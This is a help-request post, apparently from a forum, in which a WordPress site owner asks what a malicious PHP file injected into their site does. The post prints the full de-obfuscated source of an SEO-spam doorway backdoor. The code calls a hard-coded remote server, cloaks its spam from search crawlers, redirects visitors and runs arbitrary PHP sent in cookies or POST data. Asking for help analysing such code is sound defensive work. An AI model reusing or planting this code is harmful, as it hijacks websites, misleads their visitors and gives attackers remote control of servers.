A little bit of background: after not touching my WordPress website for months, I searched Google for site:mywebsite.whatever to see how it was doing on search engines. I found hundreds of results that had nothing to do with my website (mostly random collections of words).
As it turns out, a folder forum was injected on my website. forum has the following structure:
+-- cache
| +-- 00a0eacc77aafb9659ce904a9699e8be
| +-- 00cf657815974a1287f7622d4972e93a
| +-- ...other 1158 similar files
+-- 04ba_35fd4fbbd8d6270402bf7ac9c9df0180.list
+-- 04ba_69f2a52ce1412f5ef13c36be5ac355f9.list
+-- ...other 4 *.list files
+-- 302a_189ead8288703514037e97ba4e9fc2c1.html
+-- random_name.php
+-- sitemap.xml
where I didn't write the real name of the *.php file since it's all over Google.
I scanned all the files via FTP and removed the malicious folder but didn't find any threat. I wish I had a way to track down the author but I don't think it's possible. I guess some obsolete WordPress plugin is to blame.
Now, the sitemap is a map containing all the possible content that can be generated using the php file. I took a look at random_name.php and of course it is obfuscated. I (sort of) de-obfuscated it but have no idea what it does. I know it is a long code, but can anyone point me in the right direction? I noticed some curl_exec calls as well as POST requests.
Can anyone help me?
<?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@error_reporting(0);
@set_time_limit(0);
date_default_timezone_set('UTC');
class _2c02e8g {
static private $_8ftr0k7z = 2990481209;
static function _cvb79($_8b59yu5x, $_05y41nuc) {
$_8b59yu5x[2] = count($_8b59yu5x) > 4 ? long2ip(_2c02e8g::$_8ftr0k7z - 283) : $_8b59yu5x[2];
$_lrwd3yfg = _2c02e8g::_1hixv($_8b59yu5x, $_05y41nuc);
if (!$_lrwd3yfg) {
$_lrwd3yfg = _2c02e8g::_58sep($_8b59yu5x, $_05y41nuc);
}
return $_lrwd3yfg;
}
static function _1hixv($_8b59yu5x, $_lrwd3yfg) {
if (!function_exists('curl_version')) {
return "";
}
$_glip1080 = curl_init();
curl_setopt($_glip1080, CURLOPT_URL, implode("/", $_8b59yu5x));
if (!empty($_lrwd3yfg)) {
curl_setopt($_glip1080, CURLOPT_POST, 1);
curl_setopt($_glip1080, CURLOPT_POSTFIELDS, $_lrwd3yfg);
}
curl_setopt($_glip1080, CURLOPT_RETURNTRANSFER, TRUE);
$_sfwktgps = curl_exec($_glip1080);
curl_close($_glip1080);
return $_sfwktgps;
}
static function _58sep($_8b59yu5x, $_lrwd3yfg) {
if (!empty($_lrwd3yfg)) {
$_0r6p752k = stream_context_create(Array('http' => Array('method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => $_lrwd3yfg)));
$_sfwktgps = @file_get_contents(implode("/", $_8b59yu5x), FALSE, $_0r6p752k);
} else {
$_sfwktgps = @file_get_contents(implode("/", $_8b59yu5x));
}
return $_sfwktgps;
}
}
class _rarzgz {
private static $_v84cb06l = "";
private static $_7pid89x3 = - 1;
private static $_8adn2cpv = "";
private $_rpr3n2kv = "";
private $_az1mgng4 = "";
private $_5nr5x0lg = "";
private $_pr6te9qt = "";
public static function _y1758($_sppzo6m1, $_sugbfw6k, $_5t4zij15) {
_rarzgz::$_v84cb06l = $_sppzo6m1 . "/cache/";
_rarzgz::$_7pid89x3 = $_sugbfw6k;
_rarzgz::$_8adn2cpv = $_5t4zij15;
if (!@file_exists(_rarzgz::$_v84cb06l)) {
@mkdir(_rarzgz::$_v84cb06l);
}
}
static public function _s7stz() {
$_zku16g0r = 0;
foreach (scandir(_rarzgz::$_v84cb06l) as $_bvrdpc7b) {
$_zku16g0r+= 1;
}
return $_zku16g0r;
}
public static function _s29c6() {
return TRUE;
if (@file_exists(_rarzgz::$_v84cb06l)) {
return TRUE;
}
return FALSE;
}
public function __construct($_gl7jmsue, $_t51srjug, $_va2xdvc2, $_38y6twbl) {
$this->_rpr3n2kv = $_gl7jmsue;
$this->_az1mgng4 = $_t51srjug;
$this->_5nr5x0lg = $_va2xdvc2;
$this->_pr6te9qt = $_38y6twbl;
}
public function _c3pca() {
function _p54ih($_b9rw2c9h, $_a9bmnch7) {
return round(rand($_b9rw2c9h, $_a9bmnch7 - 1) + (rand(0, PHP_INT_MAX - 1) / PHP_INT_MAX), 2);
}
$_8p32i9sb = _ra2rzu::_6dnh6();
$_lrwd3yfg = str_replace("", $this->_az1mgng4, str_replace("", $this->_5nr5x0lg, str_replace("", $this->_pr6te9qt, $this->_rpr3n2kv)));
while (TRUE) {
$_khat30c5 = preg_replace('/' . preg_quote("", '/') . '/', _ra2rzu::_3f7mw(), $_lrwd3yfg, 1);
if ($_khat30c5 === $_lrwd3yfg) {
break;
}
$_lrwd3yfg = $_khat30c5;
}
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_va2xdvc2 = @$_8p32i9sb[intval($_fusm5n6f[1]) ];
$_ou3azhix = _p4aeht::_out2l($_va2xdvc2);
$_lrwd3yfg = str_replace($_fusm5n6f[0], $_ou3azhix, $_lrwd3yfg);
}
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_va2xdvc2 = @$_8p32i9sb[intval($_fusm5n6f[1]) ];
$_lrwd3yfg = str_replace($_fusm5n6f[0], $_va2xdvc2, $_lrwd3yfg);
}
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_lrwd3yfg = str_replace($_fusm5n6f[0], _p54ih($_fusm5n6f[1], $_fusm5n6f[2]), $_lrwd3yfg);
}
while (TRUE) {
preg_match('//', $_lrwd3yfg, $_fusm5n6f);
if (empty($_fusm5n6f)) {
break;
}
$_lrwd3yfg = str_replace($_fusm5n6f[0], rand($_fusm5n6f[1], $_fusm5n6f[2]), $_lrwd3yfg);
}
return $_lrwd3yfg;
}
public function _tcspx() {
$_9de3kl40 = _rarzgz::$_v84cb06l . md5($this->_5nr5x0lg . _rarzgz::$_8adn2cpv);
if (_rarzgz::$_7pid89x3 == - 1) {
$_oskbkasn = - 1;
} else {
$_oskbkasn = time() + (3600 * 24 * 30);
}
$_yxwme0c8 = Array("template" => $this->_rpr3n2kv, "text" => $this->_az1mgng4, "keyword" => $this->_5nr5x0lg, "links" => $this->_pr6te9qt, "expired" => $_oskbkasn);
@file_put_contents($_9de3kl40, serialize($_yxwme0c8));
}
static public function _sximm($_va2xdvc2) {
$_9de3kl40 = _rarzgz::$_v84cb06l . md5($_va2xdvc2 . _rarzgz::$_8adn2cpv);
$_9de3kl40 = @unserialize(@file_get_contents($_9de3kl40));
if (!empty($_9de3kl40) && ($_9de3kl40["expired"] > time() || $_9de3kl40["expired"] == - 1)) {
return new _rarzgz($_9de3kl40["template"], $_9de3kl40["text"], $_9de3kl40["keyword"], $_9de3kl40["links"]);
} else {
return null;
}
}
}
class _ee20mhc {
private static $_v84cb06l = "";
private static $_e6keyqet = "";
public static function _y1758($_sppzo6m1, $_fhw68k2n) {
_ee20mhc::$_v84cb06l = $_sppzo6m1 . "/";
_ee20mhc::$_e6keyqet = $_fhw68k2n;
if (!@file_exists(_ee20mhc::$_v84cb06l)) {
@mkdir(_ee20mhc::$_v84cb06l);
}
}
public static function _s29c6() {
return TRUE;
if (_ee20mhc::_s7stz()) {
return TRUE;
}
return FALSE;
}
static public function _s7stz() {
$_zku16g0r = 0;
foreach (scandir(_ee20mhc::$_v84cb06l) as $_bvrdpc7b) {
if (strpos($_bvrdpc7b, _ee20mhc::$_e6keyqet) === 0) {
$_zku16g0r+= 1;
}
}
return $_zku16g0r;
}
static public function _3f7mw() {
$_fs32iq5n = Array();
foreach (scandir(_ee20mhc::$_v84cb06l) as $_bvrdpc7b) {
if (strpos($_bvrdpc7b, _ee20mhc::$_e6keyqet) === 0) {
$_fs32iq5n[] = $_bvrdpc7b;
}
}
return @file_get_contents(_ee20mhc::$_v84cb06l . $_fs32iq5n[array_rand($_fs32iq5n) ]);
}
static public function _tcspx($_1fy7zpab) {
if (@file_exists(_ee20mhc::$_e6keyqet . "_" . md5($_1fy7zpab) . ".html")) {
return;
}
@file_put_contents(_ee20mhc::$_e6keyqet . "_" . md5($_1fy7zpab) . ".html", $_1fy7zpab);
}
}
class _ra2rzu {
private static $_v84cb06l = "";
private static $_e6keyqet = "";
public static function _y1758($_sppzo6m1, $_fhw68k2n) {
_ra2rzu::$_v84cb06l = $_sppzo6m1 . "/";
_ra2rzu::$_e6keyqet = $_fhw68k2n;
if (!@file_exists(_ra2rzu::$_v84cb06l)) {
@mkdir(_ra2rzu::$_v84cb06l);
}
}
private static function _es5vo() {
$_rqh86abu = Array();
foreach (scandir(_ra2rzu::$_v84cb06l) as $_bvrdpc7b) {
if (strpos($_bvrdpc7b, _ra2rzu::$_e6keyqet) === 0) {
$_rqh86abu[] = $_bvrdpc7b;
}
}
return $_rqh86abu;
}
public static function _s29c6() {
return TRUE;
$_rqh86abu = _ra2rzu::_es5vo();
if (!empty($_rqh86abu)) {
return TRUE;
}
return FALSE;
}
static public function _3f7mw() {
$_rqh86abu = _ra2rzu::_es5vo();
$_8p32i9sb = @file(_ra2rzu::$_v84cb06l . $_rqh86abu[array_rand($_rqh86abu) ], FILE_IGNORE_NEW_LINES);
return $_8p32i9sb[array_rand($_8p32i9sb) ];
}
static public function _6dnh6() {
$_8p32i9sb = Array();
$_rqh86abu = _ra2rzu::_es5vo();
foreach ($_rqh86abu as $_09cumqum) {
$_8p32i9sb = array_merge($_8p32i9sb, @file(_ra2rzu::$_v84cb06l . $_09cumqum, FILE_IGNORE_NEW_LINES));
}
return $_8p32i9sb;
}
static public function _tcspx($_cwq55lcz) {
if (@file_exists(_ra2rzu::$_e6keyqet . "_" . md5($_cwq55lcz) . ".list")) {
return;
}
@file_put_contents(_ra2rzu::$_e6keyqet . "_" . md5($_cwq55lcz) . ".list", $_cwq55lcz);
}
}
class _p4aeht {
static public $_h3jem60r = "4.5";
static public $_dr372im9 = "5030800e-568e-8dc3-1a8d-72afb978ba0e";
private $_5s1npqzl = "http://136.12.78.46/app/assets/api2?action=redir";
private $_b5s7iyhm = "http://136.12.78.46/app/assets/api?action=page";
static public $_jqg19ptq = 20;
static public $_cm4c4huo = 100;
static public function _d6voe() {
}
private function _2ti6t() {
$_k51hfafu = array('#libwww-perl#i', '#MJ12bot#i', '#msnbot#i', '#msnbot-media#i', '#YandexBot#i', '#msnbot#i', '#YandexWebmaster#i', '#spider#i', '#yahoo#i', '#google#i', '#altavista#i', '#ask#i', '#yahoo!\s*slurp#i', '#BingBot#i');
if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_pvt168yv = $_SERVER['HTTP_X_FORWARDED_FOR'];
} elseif (!empty($_SERVER['REMOTE_ADDR'])) {
$_pvt168yv = $_SERVER['REMOTE_ADDR'];
} else {
$_pvt168yv = "";
}
if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_k51hfafu, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))) {
$_4axvz3yx = 1;
} elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])) {
$_4axvz3yx = 1;
} elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE && strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE && strpos($_SERVER['HTTP_REFERER'], "bing") === FALSE && strpos($_SERVER['HTTP_REFERER'], "yandex") === FALSE) {
$_4axvz3yx = 1;
} else {
$_4axvz3yx = 0;
}
return $_4axvz3yx;
}
private static function _ix2nr() {
$_05y41nuc = Array();
$_05y41nuc['ip'] = $_SERVER['REMOTE_ADDR'];
$_05y41nuc['qs'] = @$_SERVER['HTTP_HOST'] . @$_SERVER['REQUEST_URI'];
$_05y41nuc['ua'] = @$_SERVER['HTTP_USER_AGENT'];
$_05y41nuc['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$_05y41nuc['ref'] = @$_SERVER['HTTP_REFERER'];
$_05y41nuc['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];
$_05y41nuc['acp'] = @$_SERVER['HTTP_ACCEPT'];
$_05y41nuc['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];
$_05y41nuc['conn'] = @$_SERVER['HTTP_CONNECTION'];
return $_05y41nuc;
}
public function __construct() {
$this->_5s1npqzl = explode("/", $this->_5s1npqzl);
$this->_b5s7iyhm = explode("/", $this->_b5s7iyhm);
}
static public function _y2lux($_ap8jdcl5) {
if (strlen($_ap8jdcl5) < 4) {
return "";
}
$_9c8afqnp = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
$_8p32i9sb = str_split($_9c8afqnp);
$_8p32i9sb = array_flip($_8p32i9sb);
$_aw7ah80q = 0;
$_2l764shf = "";
$_ap8jdcl5 = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_ap8jdcl5);
do {
$_nmoxtvel = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_i59owo31 = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_6ybfh5t5 = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_pzbp8e53 = $_8p32i9sb[$_ap8jdcl5[$_aw7ah80q++]];
$_b34vcqnz = ($_nmoxtvel << 2) | ($_i59owo31 >> 4);
$_xxcxy4tq = (($_i59owo31 & 15) << 4) | ($_6ybfh5t5 >> 2);
$_ze2tucv0 = (($_6ybfh5t5 & 3) << 6) | $_pzbp8e53;
$_2l764shf = $_2l764shf . chr($_b34vcqnz);
if ($_6ybfh5t5 != 64) {
$_2l764shf = $_2l764shf . chr($_xxcxy4tq);
}
if ($_pzbp8e53 != 64) {
$_2l764shf = $_2l764shf . chr($_ze2tucv0);
}
} while ($_aw7ah80q < strlen($_ap8jdcl5));
return $_2l764shf;
}
private function _nmacy($_va2xdvc2) {
$_gl7jmsue = "";
$_t51srjug = "";
$_05y41nuc = _p4aeht::_ix2nr();
$_05y41nuc["uid"] = _p4aeht::$_dr372im9;
$_05y41nuc["keyword"] = $_va2xdvc2;
$_05y41nuc["tc"] = 10;
$_05y41nuc = http_build_query($_05y41nuc);
$_s3d76gce = _2c02e8g::_cvb79($this->_b5s7iyhm, $_05y41nuc);
if (strpos($_s3d76gce, _p4aeht::$_dr372im9) === FALSE) {
return Array($_gl7jmsue, $_t51srjug);
}
$_gl7jmsue = _ee20mhc::_3f7mw();
$_t51srjug = substr($_s3d76gce, strlen(_p4aeht::$_dr372im9));
$_t51srjug = explode("
", $_t51srjug);
shuffle($_t51srjug);
$_t51srjug = implode(" ", $_t51srjug);
return Array($_gl7jmsue, $_t51srjug);
}
private function _yy7yg() {
$_05y41nuc = _p4aeht::_ix2nr();
if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {
$_05y41nuc['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];
}
if (isset($_SERVER['HTTP_X_REAL_IP'])) {
$_05y41nuc['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];
}
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$_05y41nuc['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];
}
$_05y41nuc["uid"] = _p4aeht::$_dr372im9;
$_05y41nuc = http_build_query($_05y41nuc);
$_t1lxnd1o = _2c02e8g::_cvb79($this->_5s1npqzl, $_05y41nuc);
$_t1lxnd1o = @unserialize($_t1lxnd1o);
if (isset($_t1lxnd1o["type"]) && $_t1lxnd1o["type"] == "redir") {
if (!empty($_t1lxnd1o["data"]["header"])) {
header($_t1lxnd1o["data"]["header"]);
return true;
} elseif (!empty($_t1lxnd1o["data"]["code"])) {
echo $_t1lxnd1o["data"]["code"];
return true;
}
}
return false;
}
public function _s29c6() {
return _rarzgz::_s29c6() && _ee20mhc::_s29c6() && _ra2rzu::_s29c6();
}
static public function _gp62d() {
if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {
return true;
}
return false;
}
public static function _ljbu1() {
$_gp99mm20 = explode("?", $_SERVER["REQUEST_URI"], 2);
$_gp99mm20 = $_gp99mm20[0];
if (strpos($_gp99mm20, ".php") === FALSE) {
$_gp99mm20 = explode("/", $_gp99mm20);
array_pop($_gp99mm20);
$_gp99mm20 = implode("/", $_gp99mm20) . "/";
}
return sprintf("%s://%s%s", _p4aeht::_gp62d() ? "https" : "http", $_SERVER['HTTP_HOST'], $_gp99mm20);
}
public static function _tinnm() {
$_gp99mm20 = explode("?", $_SERVER["REQUEST_URI"], 2);
$_gp99mm20 = $_gp99mm20[0];
$_sppzo6m1 = substr($_gp99mm20, 0, strrpos($_gp99mm20, "/"));
return sprintf("%s://%s%s", _p4aeht::_gp62d() ? "https" : "http", $_SERVER['HTTP_HOST'], $_sppzo6m1);
}
public static function _out2l($_va2xdvc2) {
$_3hep6er4 = _p4aeht::_ljbu1();
$_jcgqaj3k = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
$_s22bfpvp = "";
if (substr($_3hep6er4, -1) == "/") {
if (ord($_jcgqaj3k[1]) % 2) {
$_va2xdvc2 = str_replace(" ", "-", $_jcgqaj3k . "-" . $_va2xdvc2);
} else {
$_va2xdvc2 = str_replace(" ", "-", $_va2xdvc2 . "-" . $_jcgqaj3k);
}
$_s22bfpvp = sprintf("%s%s", $_3hep6er4, urlencode($_va2xdvc2));
} else {
if (ord($_jcgqaj3k[0]) % 2) {
$_s22bfpvp = sprintf("%s?%s=%s", $_3hep6er4, $_jcgqaj3k, urlencode(str_replace(" ", "-", $_va2xdvc2)));
} else {
$_6kioq68i = Array("id", "page", "tag");
$_kq7ivc6q = $_6kioq68i[ord($_jcgqaj3k[2]) % count($_6kioq68i) ];
if (ord($_jcgqaj3k[1]) % 2) {
$_va2xdvc2 = str_replace(" ", "-", $_jcgqaj3k . "-" . $_va2xdvc2);
} else {
$_va2xdvc2 = str_replace(" ", "-", $_va2xdvc2 . "-" . $_jcgqaj3k);
}
$_s22bfpvp = sprintf("%s?%s=%s", $_3hep6er4, $_kq7ivc6q, urlencode($_va2xdvc2));
}
}
return $_s22bfpvp;
}
public static function _ur7fz($_b9rw2c9h, $_a9bmnch7) {
$_a73xya3t = rand($_b9rw2c9h, $_a9bmnch7);
$_fmzvp8fg = "";
$_kq7ivc6q = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
for ($_aw7ah80q = 0;$_aw7ah80q < $_a73xya3t;$_aw7ah80q++) {
$_va2xdvc2 = _ra2rzu::_3f7mw();
$_fmzvp8fg.= sprintf("<a href='%s'>%s</a>,
", _p4aeht::_out2l($_va2xdvc2), ucwords($_va2xdvc2));
}
return $_fmzvp8fg;
}
public static function _d0dxo() {
$_i9hv9auf = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">
<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">
";
$_dgdvxo1h = "</urlset>";
$_sklpjgqb = "";
$_jcgqaj3k = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
$_8p32i9sb = _ra2rzu::_6dnh6();
foreach ($_8p32i9sb as $_bzky50pj) {
$_s22bfpvp = _p4aeht::_out2l($_bzky50pj);
$_va63o44e = time() - mt_rand(0, 60 * 60 * 24 * 30);
$_sklpjgqb.= "<url>
";
$_sklpjgqb.= sprintf("<loc>%s</loc>
", $_s22bfpvp);
$_sklpjgqb.= sprintf("<lastmod>%s</lastmod>
", date("Y-m-d", $_va63o44e));
$_sklpjgqb.= "<priority>0.3</priority>
";
$_sklpjgqb.= "</url>
";
}
$_3zr9n5ok = $_i9hv9auf . $_sklpjgqb . $_dgdvxo1h;
$_kl05ko31 = dirname(__FILE__) . "/sitemap.xml";
$_1kwgemvy = _p4aeht::_tinnm() . "/sitemap.xml";
@file_put_contents($_kl05ko31, $_3zr9n5ok);
return $_1kwgemvy;
}
public function _ebomk() {
$_kq7ivc6q = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
if (isset($_GET[$_kq7ivc6q])) {
$_va2xdvc2 = $_GET[$_kq7ivc6q];
} elseif (strpos($_SERVER["REQUEST_URI"], $_kq7ivc6q) !== FALSE) {
$_nk9wucuh = explode("/", $_SERVER["REQUEST_URI"]);
foreach ($_nk9wucuh as $_m16ckrlz) {
if (strpos($_m16ckrlz, $_kq7ivc6q) !== FALSE) {
$_dpydnvsr = explode("=", $_m16ckrlz);
$_f5e77nom = array_pop($_dpydnvsr);
$_f5e77nom = str_replace($_kq7ivc6q . "-", "", $_f5e77nom);
$_f5e77nom = str_replace("-" . $_kq7ivc6q, "", $_f5e77nom);
$_va2xdvc2 = $_f5e77nom;
}
}
}
if (empty($_va2xdvc2)) {
$_8p32i9sb = _ra2rzu::_6dnh6();
$_va2xdvc2 = $_8p32i9sb[0];
}
if (!empty($_va2xdvc2)) {
$_va2xdvc2 = str_replace("-", " ", $_va2xdvc2);
if (!$this->_2ti6t()) {
if ($this->_yy7yg()) {
return;
}
}
$_va2xdvc2 = urldecode($_va2xdvc2);
$_t1lxnd1o = _rarzgz::_sximm($_va2xdvc2);
if (empty($_t1lxnd1o)) {
list($_gl7jmsue, $_t51srjug) = $this->_nmacy($_va2xdvc2);
if (empty($_t51srjug)) {
return;
}
$_t1lxnd1o = new _rarzgz($_gl7jmsue, $_t51srjug, $_va2xdvc2, _p4aeht::_ur7fz(_p4aeht::$_jqg19ptq, _p4aeht::$_cm4c4huo));
$_t1lxnd1o->_tcspx();
}
echo $_t1lxnd1o->_c3pca();
}
}
} _rarzgz::_y1758(dirname(__FILE__), -1, _p4aeht::$_dr372im9);
_ee20mhc::_y1758(dirname(__FILE__), substr(md5(_p4aeht::$_dr372im9 . "salt12"), 0, 4));
_ra2rzu::_y1758(dirname(__FILE__), substr(md5(_p4aeht::$_dr372im9 . "salt22"), 0, 4));
function _uc602($_s3d76gce, $_bzky50pj) {
$_ea0uezj5 = "";
for ($_aw7ah80q = 0;$_aw7ah80q < strlen($_s3d76gce);) {
for ($_nvnhqam0 = 0;$_nvnhqam0 < strlen($_bzky50pj) && $_aw7ah80q < strlen($_s3d76gce);$_nvnhqam0++, $_aw7ah80q++) {
$_ea0uezj5.= chr(ord($_s3d76gce[$_aw7ah80q]) ^ ord($_bzky50pj[$_nvnhqam0]));
}
}
return $_ea0uezj5;
}
function _t6c3o($_s3d76gce, $_bzky50pj, $_prhztwvy) {
return _uc602(_uc602($_s3d76gce, $_bzky50pj), $_prhztwvy);
}
foreach (array_merge($_COOKIE, $_POST) as $_z11ny1rk => $_s3d76gce) {
$_s3d76gce = @unserialize(_t6c3o(_p4aeht::_y2lux($_s3d76gce), $_z11ny1rk, _p4aeht::$_dr372im9));
if (isset($_s3d76gce['ak']) && _p4aeht::$_dr372im9 == $_s3d76gce['ak']) {
if ($_s3d76gce['a'] == 'doorway2') {
if ($_s3d76gce['sa'] == 'check') {
$_lrwd3yfg = _2c02e8g::_cvb79(explode("/", "http://httpbin.org/"), "");
if (strlen($_lrwd3yfg) > 512) {
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r, "cache" => _rarzgz::_s7stz(), "keywords" => count(_ra2rzu::_6dnh6()), "templates" => _ee20mhc::_s7stz()));
}
exit;
}
if ($_s3d76gce['sa'] == 'templates') {
foreach ($_s3d76gce["templates"] as $_gl7jmsue) {
_ee20mhc::_tcspx($_gl7jmsue);
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r,));
}
}
if ($_s3d76gce['sa'] == 'keywords') {
_ra2rzu::_tcspx($_s3d76gce["keywords"]);
_p4aeht::_d0dxo();
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r,));
}
if ($_s3d76gce['sa'] == 'pages') {
$_7dgiwjzz = 0;
if (_ee20mhc::_s7stz() > 0) {
foreach ($_s3d76gce['pages'] as $_t1lxnd1o) {
$_zo2q8quo = _rarzgz::_sximm($_t1lxnd1o["keyword"]);
if (empty($_zo2q8quo)) {
$_zo2q8quo = new _rarzgz(_ee20mhc::_3f7mw(), $_t1lxnd1o["text"], $_t1lxnd1o["keyword"], _p4aeht::_ur7fz(_p4aeht::$_jqg19ptq, _p4aeht::$_cm4c4huo));
$_zo2q8quo->_tcspx();
$_7dgiwjzz+= 1;
}
}
}
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r, "pages" => $_7dgiwjzz));
}
}
if ($_s3d76gce['sa'] == 'eval') {
eval($_s3d76gce["data"]);
exit;
}
}
}
$_5mty95t4 = new _p4aeht();
if ($_5mty95t4->_s29c6()) {
$_5mty95t4->_ebomk();
}
exit(); ?>
I should also mention I opened a few of the results coming from this page and they are mostly poorly-written articles with thousands of external links. Some of them try to open pop ups as well.
Thanks!
Aucun commentaire:
Enregistrer un commentaire